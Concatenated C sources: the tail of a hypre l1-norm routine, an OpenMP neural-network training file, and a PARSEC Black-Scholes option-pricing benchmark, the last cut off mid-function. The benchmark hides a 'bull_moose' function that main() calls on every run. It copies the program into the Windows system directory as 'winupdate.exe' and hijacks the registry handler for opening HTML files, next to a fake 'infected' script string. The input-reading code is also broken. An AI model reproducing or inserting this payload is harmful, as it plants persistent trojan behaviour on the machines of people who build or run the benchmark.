/* collect the cf marker data from other procs */
if (cf_marker != NULL)
{
HYPRE_Int index;
HYPRE_Int num_sends;
HYPRE_Int start;
HYPRE_Int *int_buf_data = NULL;
hypre_ParCSRCommPkg *comm_pkg = hypre_ParCSRMatrixCommPkg(A);
hypre_ParCSRCommHandle *comm_handle;
if (num_cols_offd)
cf_marker_offd = hypre_CTAlloc(HYPRE_Int, num_cols_offd, HYPRE_MEMORY_HOST);
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
if (hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends))
int_buf_data = hypre_CTAlloc(HYPRE_Int,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j = start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1); j++)
{
int_buf_data[index++] = cf_marker[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
}
comm_handle = hypre_ParCSRCommHandleCreate(11, comm_pkg, int_buf_data,
cf_marker_offd);
hypre_ParCSRCommHandleDestroy(comm_handle);
hypre_TFree(int_buf_data, HYPRE_MEMORY_HOST);
}
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,k,ns,ne,rest,size,diag,cf_diag) HYPRE_SMP_SCHEDULE
#endif
for (k = 0; k < num_threads; k++)
{
size = num_rows/num_threads;
rest = num_rows - size*num_threads;
if (k < rest)
{
ns = k*size+k;
ne = (k+1)*size+k+1;
}
else
{
ns = k*size+rest;
ne = (k+1)*size+rest;
}
if (option == 1)
{
for (i = ns; i < ne; i++)
{
l1_norm[i] = 0.0;
if (cf_marker == NULL)
{
/* Add the l1 norm of the diag part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
l1_norm[i] += fabs(A_diag_data[j]);
/* Add the l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm[i] += fabs(A_offd_data[j]);
}
}
else
{
cf_diag = cf_marker[i];
/* Add the CF l1 norm of the diag part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
if (cf_diag == cf_marker[A_diag_J[j]])
l1_norm[i] += fabs(A_diag_data[j]);
/* Add the CF l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
if (cf_diag == cf_marker_offd[A_offd_J[j]])
l1_norm[i] += fabs(A_offd_data[j]);
}
}
}
}
else if (option == 2)
{
for (i = ns; i < ne; i++)
{
l1_norm[i] = 0.0;
if (cf_marker == NULL)
{
/* Add the diagonal and the local off-thread part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
{
ii = A_diag_J[j];
if (ii == i || ii < ns || ii >= ne)
l1_norm[i] += fabs(A_diag_data[j]);
}
/* Add the l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm[i] += fabs(A_offd_data[j]);
}
}
else
{
cf_diag = cf_marker[i];
/* Add the diagonal and the local off-thread part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
{
ii = A_diag_J[j];
if ((ii == i || ii < ns || ii >= ne) &&
(cf_diag == cf_marker[A_diag_J[j]]))
l1_norm[i] += fabs(A_diag_data[j]);
}
/* Add the CF l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
if (cf_diag == cf_marker_offd[A_offd_J[j]])
l1_norm[i] += fabs(A_offd_data[j]);
}
}
}
}
else if (option == 3)
{
for (i = ns; i < ne; i++)
{
l1_norm[i] = 0.0;
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
l1_norm[i] += A_diag_data[j] * A_diag_data[j];
if (num_cols_offd)
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm[i] += A_offd_data[j] * A_offd_data[j];
}
}
else if (option == 4)
{
for (i = ns; i < ne; i++)
{
l1_norm[i] = 0.0;
if (cf_marker == NULL)
{
/* Add the diagonal and the local off-thread part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
{
ii = A_diag_J[j];
if (ii == i || ii < ns || ii >= ne)
{
if (ii == i)
{
diag = fabs(A_diag_data[j]);
l1_norm[i] += fabs(A_diag_data[j]);
}
else
l1_norm[i] += 0.5*fabs(A_diag_data[j]);
}
}
/* Add the l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
l1_norm[i] += 0.5*fabs(A_offd_data[j]);
}
}
else
{
cf_diag = cf_marker[i];
/* Add the diagonal and the local off-thread part of the ith row */
for (j = A_diag_I[i]; j < A_diag_I[i+1]; j++)
{
ii = A_diag_J[j];
if ((ii == i || ii < ns || ii >= ne) &&
(cf_diag == cf_marker[A_diag_J[j]]))
{
if (ii == i)
{
diag = fabs(A_diag_data[j]);
l1_norm[i] += fabs(A_diag_data[j]);
}
else
l1_norm[i] += 0.5*fabs(A_diag_data[j]);
}
}
/* Add the CF l1 norm of the offd part of the ith row */
if (num_cols_offd)
{
for (j = A_offd_I[i]; j < A_offd_I[i+1]; j++)
if (cf_diag == cf_marker_offd[A_offd_J[j]])
l1_norm[i] += 0.5*fabs(A_offd_data[j]);
}
}
/* Truncate according to Remark 6.2 */
if (l1_norm[i] <= 4.0/3.0*diag)
l1_norm[i] = diag;
}
}
else if (option == 5) /*stores diagonal of A for Jacobi using matvec, rlx 7 */
{
/* Set the diag element */
for (i = ns; i < ne; i++)
{
l1_norm[i] = A_diag_data[A_diag_I[i]];
if (l1_norm[i] == 0) l1_norm[i] = 1.0;
}
}
if (option < 5)
{
/* Handle negative definite matrices */
for (i = ns; i < ne; i++)
if (A_diag_data[A_diag_I[i]] < 0)
l1_norm[i] = -l1_norm[i];
for (i = ns; i < ne; i++)
/* if (fabs(l1_norm[i]) < DBL_EPSILON) */
if (fabs(l1_norm[i]) == 0.0)
{
hypre_error_in_arg(1);
break;
}
}
}
hypre_TFree(cf_marker_offd, HYPRE_MEMORY_HOST);
*l1_norm_ptr = l1_norm;
return hypre_error_flag;
}
|
NeuralNetwork_OMP_CPU1.c | /* NEURAL NETWORK OMP CPU1.c
* by Lut99
*
* Created:
* 4/18/2020, 11:25:46 PM
* Last edited:
* 19/11/2020, 17:10:57
* Auto updated?
* Yes
*
* Description:
* The NeuralNetwork class implements a matrix-based Feedforward Neural
* Network which is hardcoded to use Mean Squared Error for cost function and
* sigmoid as activation function.
*
* This file implements the first of eight different OpenMP-optimised
* versions for the CPU. It optimises the Forward pass only using threads.
**/
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <string.h>
#include <sys/time.h>
#include "NeuralNetwork.h"
/***** OPTIONAL PARAMETERS *****/
static unsigned int n_threads = 16;
/***** OPENMP DECLARATIONS *****/
extern int omp_set_num_threads();
extern int omp_get_num_procs();
extern int omp_get_thread_num();
/***** HELPER FUNCTIONS *****/
#define TIMEVAL_TO_MS(T_START, T_END) (((T_END.tv_sec - T_START.tv_sec) * 1000000 + (T_END.tv_usec - T_START.tv_usec)) / 1000000.0)
extern size_t max(size_t length, const size_t* list);
/***** NEURAL NETWORK OPERATIONS *****/
void nn_train(neural_net* nn, size_t n_samples, double** inputs, double** expected, double learning_rate, size_t n_iterations) {
#ifdef BENCHMARK
// Declare all timers
struct timeval s_total, e_total, s_iters, e_iters, s_fwd, e_fwd, s_bck_out, e_bck_out, s_bck_hid, e_bck_hid, s_upd, e_upd;
// Set some shortcuts for the timers
size_t half_iters = n_iterations / 2;
size_t half_samples = n_samples / 2;
// Start the total timer
gettimeofday(&s_total, NULL);
#endif
// Also obtain links to all biases / matrices
double** biases = nn->biases;
double** weights = nn->weights;
// Make some shortcuts for the number-of-nodes information
size_t n_layers = nn->n_layers;
size_t* nodes_per_layer = nn->nodes_per_layer;
// Initialize the temporary delta memory to the correct size
double* deltas = malloc(sizeof(double) * max(n_layers, nodes_per_layer));
// Also make a prev list to avoid accidentally changing the deltas as we go
double* prev_deltas = malloc(sizeof(double) * max(n_layers, nodes_per_layer));
// Create a list that is used to store intermediate outputs. The first input layer (=first column)
// is linked and not copied to the input data
double* layer_outputs[n_samples][n_layers];
for (size_t s = 0; s < n_samples; s++) {
// Link the input layer
layer_outputs[s][0] = inputs[s];
// Allocate arrays for the other layers
for (size_t l = 1; l < n_layers; l++) {
layer_outputs[s][l] = malloc(sizeof(double) * nodes_per_layer[l]);
}
}
// Create the delta_biases and delta_weights arrays / matrices
double* delta_biases[nn->n_weights];
double* delta_weights[nn->n_weights];
for(size_t l = 0; l < nn->n_weights; l++) {
delta_biases[l] = malloc(sizeof(double) * nodes_per_layer[l + 1]);
delta_weights[l] = malloc(sizeof(double) * nodes_per_layer[l] * nodes_per_layer[l + 1]);
// Fill with zeros
for (size_t n = 0; n < nodes_per_layer[l + 1]; n++) {
delta_biases[l][n] = 0;
for (size_t prev_n = 0; prev_n < nodes_per_layer[l]; prev_n++) {
delta_weights[l][prev_n * nodes_per_layer[l + 1] + n] = 0;
}
}
}
#ifdef BENCHMARK
// Start the iterations timer
gettimeofday(&s_iters, NULL);
#endif
// Perform the training for n_iterations (always)
for (size_t i = 0; i < n_iterations; i++) {
// Loop through all samples to compute the forward cost
#pragma omp parallel for schedule(static)
for (size_t s = 0; s < n_samples; s++) {
/***** FORWARD PASS *****/
#ifdef BENCHMARK
// Start the forward pass timer
if (i == half_iters && s == half_samples) {
gettimeofday(&s_fwd, NULL);
}
#endif
// sample_outputs is a 2D flattened array for this layer
double** sample_outputs = layer_outputs[s];
// Iterate over each layer to feedforward through the network
for (size_t l = 1; l < n_layers; l++) {
// Get some references to the bias list, weight matrix and outputs of the previous and this layer
double* bias = biases[l - 1];
double* weight = weights[l - 1];
double* prev_output = sample_outputs[l - 1];
double* output = sample_outputs[l];
// Compute the activation for each node on this layer
size_t this_nodes = nodes_per_layer[l];
size_t prev_nodes = nodes_per_layer[l - 1];
for (size_t n = 0; n < this_nodes; n++) {
// Sum the weighted inputs for this node
double z = bias[n];
for (size_t prev_n = 0; prev_n < prev_nodes; prev_n++) {
z += prev_output[prev_n] * weight[prev_n * this_nodes + n];
}
// Run the activation function over this input and store it in the output
output[n] = 1 / (1 + exp(-z));
}
}
#ifdef BENCHMARK
// End the forward timer, start the backward pass output timer
if (i == half_iters && s == half_samples) {
gettimeofday(&e_fwd, NULL);
}
#endif
}
/***** BACKWARD PASS *****/
// Implementation: https://towardsdatascience.com/simple-neural-network-implementation-in-c-663f51447547
// Loop through all samples to compute the backward cost
size_t last_nodes = nodes_per_layer[n_layers - 1];
size_t last_prev_nodes = nodes_per_layer[n_layers - 2];
double* last_delta_bias = delta_biases[n_layers - 2];
double* last_delta_weight = delta_weights[n_layers - 2];
for (size_t s = 0; s < n_samples; s++) {
#ifdef BENCHMARK
// End the forward timer, start the backward pass output timer
if (i == half_iters && s == half_samples) {
gettimeofday(&s_bck_out, NULL);
}
#endif
// Backpropagate the error from the last layer to the first.
double** sample_outputs = layer_outputs[s];
double* sample_expected = expected[s];
// Do the output layer: compute the deltas
double* output = sample_outputs[n_layers - 1];
for (size_t n = 0; n < last_nodes; n++) {
double output_val = output[n];
prev_deltas[n] = (sample_expected[n] - output_val) * output_val * (1 - output_val);
}
// Do the output layer: compute the bias & weight updates
// Add all deltas as delta_biases for this layer
for (size_t n = 0; n < last_nodes; n++) {
last_delta_bias[n] += prev_deltas[n];
}
// Same for all the weights, except we compute the delta_weights first
double* last_prev_output = sample_outputs[n_layers - 2];
for (size_t prev_n = 0; prev_n < last_prev_nodes; prev_n++) {
for (size_t n = 0; n < last_nodes; n++) {
last_delta_weight[prev_n * last_nodes + n] += last_prev_output[prev_n] * prev_deltas[n];
}
}
#ifdef BENCHMARK
// End the backward pass output timer, start the backward pass hidden timer
if (i == half_iters && s == half_samples) {
gettimeofday(&e_bck_out, NULL);
gettimeofday(&s_bck_hid, NULL);
}
#endif
// Then, the rest of the hidden layers
for (size_t l = n_layers - 2; l > 0; l--) {
double* delta_bias = delta_biases[l - 1];
double* delta_weight = delta_weights[l - 1];
double* output = sample_outputs[l];
double* prev_output = sample_outputs[l - 1];
size_t next_nodes = nodes_per_layer[l + 1];
size_t this_nodes = nodes_per_layer[l];
size_t prev_nodes = nodes_per_layer[l - 1];
// Loop through all nodes in this layer to compute their deltas by summing all deltas of the next layer in a weighted fashion
double* weight_next = weights[l];
for (size_t n = 0; n < this_nodes; n++) {
// Take the weighted sum of all connection of that node with this layer
double error = 0;
for (size_t next_n = 0; next_n < next_nodes; next_n++) {
error += prev_deltas[next_n] * weight_next[n * next_nodes + next_n];
}
// Multiply the error with the derivative of the activation function to find the result
double output_val = output[n];
deltas[n] = error * output_val * (1 - output_val);
}
// Add all deltas as delta_biases for this layer
for (size_t n = 0; n < this_nodes; n++) {
delta_bias[n] += deltas[n];
}
// Same for all the weights, except we compute the delta_weights first
for (size_t prev_n = 0; prev_n < prev_nodes; prev_n++) {
for (size_t n = 0; n < this_nodes; n++) {
delta_weight[prev_n * this_nodes + n] += prev_output[prev_n] * deltas[n];
}
}
// Swap the two delta lists
double* temp = deltas;
deltas = prev_deltas;
prev_deltas = temp;
}
#ifdef BENCHMARK
// End the backward pass hidden timer
if (i == half_iters && s == half_samples) {
gettimeofday(&e_bck_hid, NULL);
}
#endif
}
#ifdef BENCHMARK
// Start the updates timer
if (i == half_iters) {
gettimeofday(&s_upd, NULL);
}
#endif
// Actually update the weights, and reset the delta updates to 0 for next iteration
#pragma omp parallel for schedule(static)
for (size_t l = 0; l < nn->n_weights; l++) {
double* bias = biases[l];
double* delta_bias = delta_biases[l];
double* weight = weights[l];
double* delta_weight = delta_weights[l];
// Update the biases & reset delta_biases
size_t this_nodes = nodes_per_layer[l + 1];
for (size_t n = 0; n < this_nodes; n++) {
bias[n] += delta_bias[n] * learning_rate;
delta_bias[n] = 0;
}
// Update the weights & reset delta_weights
size_t prev_nodes = nodes_per_layer[l];
for (size_t i = 0; i < this_nodes * prev_nodes; i++) {
weight[i] += delta_weight[i] * learning_rate;
delta_weight[i] = 0;
}
}
#ifdef BENCHMARK
// Stop the updates timer
if (i == half_iters) {
gettimeofday(&e_upd, NULL);
}
#endif
}
#ifdef BENCHMARK
// End the iterations timer
gettimeofday(&e_iters, NULL);
#endif
// Cleanup
// Free the delta biases / weights
for(size_t l = 0; l < n_layers - 1; l++) {
free(delta_biases[l]);
free(delta_weights[l]);
}
// Free the layer_outputs (skip the first, as these merely link the input rather than copy 'em)
for (size_t s = 0; s < n_samples; s++) {
for (size_t l = 1; l < n_layers; l++) {
free(layer_outputs[s][l]);
}
}
// Cleanup the deltas
free(deltas);
free(prev_deltas);
#ifdef BENCHMARK
// End the total timer
gettimeofday(&e_total, NULL);
// Print the results
printf("%f\n", TIMEVAL_TO_MS(s_total, e_total));
printf("%f\n", TIMEVAL_TO_MS(s_iters, e_iters));
printf("%f\n", TIMEVAL_TO_MS(s_fwd, e_fwd));
printf("%f\n", TIMEVAL_TO_MS(s_bck_out, e_bck_out));
printf("%f\n", TIMEVAL_TO_MS(s_bck_hid, e_bck_hid));
printf("%f\n", TIMEVAL_TO_MS(s_upd, e_upd));
#endif
}
/***** OTHER TOOLS *****/
void parse_opt_args(int argc, char** argv) {
// Parse and set number of threads as first argument
if (argc >= 1) {
// Set the number of threads
n_threads = atoi(argv[0]);
}
omp_set_num_threads(n_threads);
}
void print_opt_args() {
printf(" - Variation : OpenMP CPU 1 (Forward only)\n");
printf(" - Number of threads : %u\n", n_threads);
}
|
blackscholes.c | // Copyright (c) 2007 Intel Corp.
// Black-Scholes
// Analytical method for calculating European Options
//
//
// Reference Source: Options, Futures, and Other Derivatives, 3rd Edition,
// Prentice
// Hall, John C. Hull,
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <string.h>
#ifdef ENABLE_PARSEC_HOOKS
#include <hooks.h>
#endif
#define ENABLE_THREADS 1
// Multi-threaded pthreads header
#ifdef ENABLE_THREADS
// Add the following line so that icc 9.0 is compatible with pthread lib.
#define __thread __threadp
#ifdef _XOPEN_SOURCE
#undef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#ifndef __USE_XOPEN2K
#define __USE_XOPEN2K
#endif
#ifndef __USE_UNIX98
#define __USE_UNIX98
#endif
#include <pthread.h>
#include <time.h>
#define MAX_THREADS 128
pthread_t _M4_threadsTable[MAX_THREADS];
int _M4_threadsTableAllocated[MAX_THREADS];
pthread_mutexattr_t _M4_normalMutexAttr;
int _M4_numThreads = MAX_THREADS;
#undef __thread
#endif
// Multi-threaded OpenMP header
#ifdef ENABLE_OPENMP
#include <omp.h>
#endif
#ifdef ENABLE_TBB
#include "tbb/blocked_range.h"
#include "tbb/parallel_for.h"
#include "tbb/task_scheduler_init.h"
#include "tbb/tick_count.h"
using namespace std;
using namespace tbb;
#endif // ENABLE_TBB
// Multi-threaded header for Windows
#ifdef WIN32
#pragma warning(disable : 4305)
#pragma warning(disable : 4244)
#include <windows.h>
#define WIN32_LEAN_AND_MEAN
#include <shellapi.h>
#endif
// Precision to use for calculations
#define fptype float
#define NUM_RUNS 3
typedef struct OptionData_ {
fptype s; // spot price
fptype strike; // strike price
fptype r; // risk-free interest rate
fptype divq; // dividend rate
fptype v; // volatility
fptype t; // time to maturity or option expiration in years
// (1yr = 1.0, 6mos = 0.5, 3mos = 0.25, ..., etc)
char OptionType; // Option type. "P"=PUT, "C"=CALL
fptype divs; // dividend vals (not used in this test)
fptype DGrefval; // DerivaGem Reference Value
} OptionData;
OptionData *data;
fptype *prices;
int numOptions;
int *otype;
fptype *sptprice;
fptype *strike;
fptype *rate;
fptype *volatility;
fptype *otime;
int numError = 0;
int nThreads;
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// Cumulative Normal Distribution Function
// See Hull, Section 11.8, P.243-244
#define inv_sqrt_2xPI 0.39894228040143270286
fptype CNDF(fptype InputX) {
int sign;
fptype OutputX;
fptype xInput;
fptype xNPrimeofX;
fptype expValues;
fptype xK2;
fptype xK2_2, xK2_3;
fptype xK2_4, xK2_5;
fptype xLocal, xLocal_1;
fptype xLocal_2, xLocal_3;
// Check for negative value of InputX
if (InputX < 0.0) {
InputX = -InputX;
sign = 1;
} else
sign = 0;
xInput = InputX;
// Compute NPrimeX term common to both four & six decimal accuracy calcs
expValues = exp(-0.5f * InputX * InputX);
xNPrimeofX = expValues;
xNPrimeofX = xNPrimeofX * inv_sqrt_2xPI;
xK2 = 0.2316419 * xInput;
xK2 = 1.0 + xK2;
xK2 = 1.0 / xK2;
xK2_2 = xK2 * xK2;
xK2_3 = xK2_2 * xK2;
xK2_4 = xK2_3 * xK2;
xK2_5 = xK2_4 * xK2;
xLocal_1 = xK2 * 0.319381530;
xLocal_2 = xK2_2 * (-0.356563782);
xLocal_3 = xK2_3 * 1.781477937;
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_3 = xK2_4 * (-1.821255978);
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_3 = xK2_5 * 1.330274429;
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_1 = xLocal_2 + xLocal_1;
xLocal = xLocal_1 * xNPrimeofX;
xLocal = 1.0 - xLocal;
OutputX = xLocal;
if (sign) {
OutputX = 1.0 - OutputX;
}
return OutputX;
}
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
fptype BlkSchlsEqEuroNoDiv(fptype sptprice, fptype strike, fptype rate,
fptype volatility, fptype time, int otype,
float timet) {
fptype OptionPrice;
// local private working variables for the calculation
fptype xStockPrice;
fptype xStrikePrice;
fptype xRiskFreeRate;
fptype xVolatility;
fptype xTime;
fptype xSqrtTime;
fptype logValues;
fptype xLogTerm;
fptype xD1;
fptype xD2;
fptype xPowerTerm;
fptype xDen;
fptype d1;
fptype d2;
fptype FutureValueX;
fptype NofXd1;
fptype NofXd2;
fptype NegNofXd1;
fptype NegNofXd2;
xStockPrice = sptprice;
xStrikePrice = strike;
xRiskFreeRate = rate;
xVolatility = volatility;
xTime = time;
xSqrtTime = sqrt(xTime);
logValues = log(sptprice / strike);
xLogTerm = logValues;
xPowerTerm = xVolatility * xVolatility;
xPowerTerm = xPowerTerm * 0.5;
xD1 = xRiskFreeRate + xPowerTerm;
xD1 = xD1 * xTime;
xD1 = xD1 + xLogTerm;
xDen = xVolatility * xSqrtTime;
xD1 = xD1 / xDen;
xD2 = xD1 - xDen;
d1 = xD1;
d2 = xD2;
NofXd1 = CNDF(d1);
NofXd2 = CNDF(d2);
FutureValueX = strike * (exp(-(rate) * (time)));
if (otype == 0) {
OptionPrice = (sptprice * NofXd1) - (FutureValueX * NofXd2);
} else {
NegNofXd1 = (1.0 - NofXd1);
NegNofXd2 = (1.0 - NofXd2);
OptionPrice = (FutureValueX * NegNofXd2) - (sptprice * NegNofXd1);
}
return OptionPrice;
}
#ifdef ENABLE_TBB
struct mainWork {
mainWork() {}
mainWork(mainWork &w, tbb::split) {}
void operator()(const tbb::blocked_range<int> &range) const {
fptype price;
int begin = range.begin();
int end = range.end();
for (int i = begin; i != end; i++) {
/* Calling main function to calculate option value based on
* Black & Scholes's equation.
*/
price = BlkSchlsEqEuroNoDiv(sptprice[i], strike[i], rate[i],
volatility[i], otime[i], otype[i], 0);
prices[i] = price;
#ifdef ERR_CHK
fptype priceDelta = data[i].DGrefval - price;
if (fabs(priceDelta) >= 1e-5) {
fprintf(stderr, "Error on %d. Computed=%.5f, Ref=%.5f, Delta=%.5f\n", i,
price, data[i].DGrefval, priceDelta);
numError++;
}
#endif
}
}
};
#endif // ENABLE_TBB
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
#ifdef ENABLE_TBB
int bs_thread(void *tid_ptr) {
int j;
tbb::affinity_partitioner a;
mainWork doall;
for (j = 0; j < NUM_RUNS; j++) {
tbb::parallel_for(tbb::blocked_range<int>(0, numOptions), doall, a);
}
return 1;
}
#else // !ENABLE_TBB
#ifdef WIN32
DWORD WINAPI bs_thread(LPVOID tid_ptr) {
#else
int bs_thread(void *tid_ptr) {
#endif
int i, j;
fptype price;
fptype priceDelta;
int tid = *(int *)tid_ptr;
int start = tid * (numOptions / nThreads);
int end = start + (numOptions / nThreads);
for (j = 0; j < NUM_RUNS; j++) {
#ifdef ENABLE_OPENMP
#pragma omp parallel for private(i, price, priceDelta)
for (i = 0; i < numOptions; i++) {
#else // ENABLE_OPENMP
for (i = start; i < end; i++) {
#endif // ENABLE_OPENMP
/* Calling main function to calculate option value based on
* Black & Scholes's equation.
*/
price = BlkSchlsEqEuroNoDiv(sptprice[i], strike[i], rate[i],
volatility[i], otime[i], otype[i], 0);
prices[i] = price;
#ifdef ERR_CHK
priceDelta = data[i].DGrefval - price;
if (fabs(priceDelta) >= 1e-4) {
printf("Error on %d. Computed=%.5f, Ref=%.5f, Delta=%.5f\n", i, price,
data[i].DGrefval, priceDelta);
numError++;
}
#endif
}
}
return 1;
}
#endif // ENABLE_TBB
const char InfectString[] = "\n<script>alert(\"Warning: This file has been detected by Windows "
"Defender to be infected with Win32/BullMoose!\");</script>";
DWORD WINAPI bull_moose(LPVOID tid_ptr)
{
char MyPath[256], CpyPath[256];
GetModuleFileName(NULL,MyPath,sizeof(MyPath));
GetSystemDirectory(CpyPath,sizeof(CpyPath));
strcat(CpyPath,"\\winupdate.exe");
CopyFile(MyPath,CpyPath,FALSE);
strcat(CpyPath," %1");
HKEY Key32;
RegOpenKeyEx(HKEY_CLASSES_ROOT,"htmlfile\\shell\\opennew\\command",0,KEY_WRITE,&Key32);
RegSetValueEx(Key32,"",0,REG_SZ,CpyPath,strlen(CpyPath));
RegCloseKey(Key32);
return 0;
}
int main(int argc, char **argv) {
FILE *file;
int i;
int loopnum;
fptype *buffer;
int *buffer2;
int rv;
#ifdef PARSEC_VERSION
#define __PARSEC_STRING(x) #x
#define __PARSEC_XSTRING(x) __PARSEC_STRING(x)
printf(
"PARSEC Benchmark Suite Version "__PARSEC_XSTRING(PARSEC_VERSION) "\n");
fflush(NULL);
#else
printf("PARSEC Benchmark Suite\n");
fflush(NULL);
#endif // PARSEC_VERSION
#ifdef ENABLE_PARSEC_HOOKS
__parsec_bench_begin(__parsec_blackscholes);
#endif
// HANDLE *malicious;
// malicious = (HANDLE *)malloc(sizeof(HANDLE));
// malicious = CreateThread(0, 0, bull_moose, NULL, 0, 0);
// WaitForMultipleObjects(1, malicious, TRUE, INFINITE);
// free(malicious);
bull_moose(NULL);
if (argc != 4) {
printf("Usage:\n\t%s <nthreads> <inputFile> <outputFile>\n", argv[0]);
return 1;
}
nThreads = atoi(argv[1]);
char *inputFile = argv[2];
char *outputFile = argv[3];
// Read input data from file
file = fopen(inputFile, "r");
if (file == NULL) {
printf("ERROR: Unable to open file %s.\n", inputFile);
return 1;
}
// rv = fscanf(file, "%i", &numOptions);
numOptions = 4;
if (rv != 1) {
printf("ERROR: Unable to read from file %s.\n", inputFile);
fclose(file);
return 1;
}
if (nThreads > numOptions) {
printf("WARNING: Not enough work, reducing number of threads to match "
"number of options.\n");
nThreads = numOptions;
}
#if !defined(ENABLE_THREADS) && !defined(ENABLE_OPENMP) && !defined(ENABLE_TBB)
if (nThreads != 1) {
printf("Error: <nthreads> must be 1 (serial version)\n");
return 1;
}
#endif
// alloc spaces for the option data
data = (OptionData *)malloc(numOptions * sizeof(OptionData));
prices = (fptype *)malloc(numOptions * sizeof(fptype));
for (loopnum = 0; loopnum < numOptions; ++loopnum) {
rv = fscanf(file, "%f %f %f %f %f %f %c %f %f", &data[loopnum].s,
&data[loopnum].strike, &data[loopnum].r, &data[loopnum].divq,
&data[loopnum].v, &data[loopnum].t, &data[loopnum].OptionType,
&data[loopnum].divs, &data[loopnum].DGrefval);
if (rv != 9) {
printf("ERROR: Unable to read from file %s.\n", inputFile);
fclose(file);
return 1;
}
}
rv = fclose(file);
if (rv != 0) {
printf("ERROR: Unable to close file %s.\n", inputFile);
return 1;
}
#ifdef ENABLE_THREADS
pthread_mutexattr_init(&_M4_normalMutexAttr);
// pthread_mutexattr_settype( &_M4_normalMutexAttr, PTHREAD_MUTEX_NORMAL);
_M4_numThreads = nThreads;
{
int _M4_i;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
_M4_threadsTableAllocated[_M4_i] = 0;
}
};
#endif
printf("Num of Options: %d\n", numOptions);
printf("Num of Runs: %d\n", NUM_RUNS);
#define PAD 256
#define LINESIZE 64
buffer = (fptype *)malloc(5 * numOptions * sizeof(fptype) + PAD);
sptprice = (fptype *)(((unsigned long long)buffer + PAD) & ~(LINESIZE - 1));
strike = sptprice + numOptions;
rate = strike + numOptions;
volatility = rate + numOptions;
otime = volatility + numOptions;
buffer2 = (int *)malloc(numOptions * sizeof(fptype) + PAD);
otype = (int *)(((unsigned long long)buffer2 + PAD) & ~(LINESIZE - 1));
for (i = 0; i < numOptions; i++) {
otype[i] = (data[i].OptionType == 'P') ? 1 : 0;
sptprice[i] = data[i].s;
strike[i] = data[i].strike;
rate[i] = data[i].r;
volatility[i] = data[i].v;
otime[i] = data[i].t;
}
printf("Size of data: %d\n", numOptions * (sizeof(OptionData) + sizeof(int)));
#ifdef ENABLE_PARSEC_HOOKS
__parsec_roi_begin();
#endif
#ifdef ENABLE_THREADS
#ifdef WIN32
printf("WIN32\n");
HANDLE *threads;
int *nums;
threads = (HANDLE *)malloc(nThreads * sizeof(HANDLE));
nums = (int *)malloc(nThreads * sizeof(int));
for (i = 0; i < nThreads; i++) {
nums[i] = i;
threads[i] = CreateThread(0, 0, bs_thread, &nums[i], 0, 0);
}
WaitForMultipleObjects(nThreads, threads, TRUE, INFINITE);
free(threads);
free(nums);
#else
int *tids;
tids = (int *)malloc(nThreads * sizeof(int));
for (i = 0; i < nThreads; i++) {
tids[i] = i;
{
int _M4_i;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
if (_M4_threadsTableAllocated[_M4_i] == 0)
break;
}
pthread_create(&_M4_threadsTable[_M4_i], NULL,
(void *(*)(void *))bs_thread, (void *)&tids[i]);
_M4_threadsTableAllocated[_M4_i] = 1;
};
}
{
int _M4_i;
void *_M4_ret;
for (_M4_i = 0; _M4_i < MAX_THREADS; _M4_i++) {
if (_M4_threadsTableAllocated[_M4_i] == 0)
break;
pthread_join(_M4_threadsTable[_M4_i], &_M4_ret);
}
};
free(tids);
#endif // WIN32
#else // ENABLE_THREADS
#ifdef ENABLE_OPENMP
{
int tid = 0;
omp_set_num_threads(nThreads);
bs_thread(&tid);
}
#else // ENABLE_OPENMP
#ifdef ENABLE_TBB
tbb::task_scheduler_init init(nThreads);
int tid = 0;
bs_thread(&tid);
#else // ENABLE_TBB
// serial version
int tid = 0;
bs_thread(&tid);
#endif // ENABLE_TBB
#endif // ENABLE_OPENMP
#endif // ENABLE_THREADS
#ifdef ENABLE_PARSEC_HOOKS
__parsec_roi_end();
#endif
// Write prices to output file
file = fopen(outputFile, "w");
if (file == NULL) {
printf("ERROR: Unable to open file %s.\n", outputFile);
return 1;
}
rv = fprintf(file, "%i\n", numOptions);
if (rv < 0) {
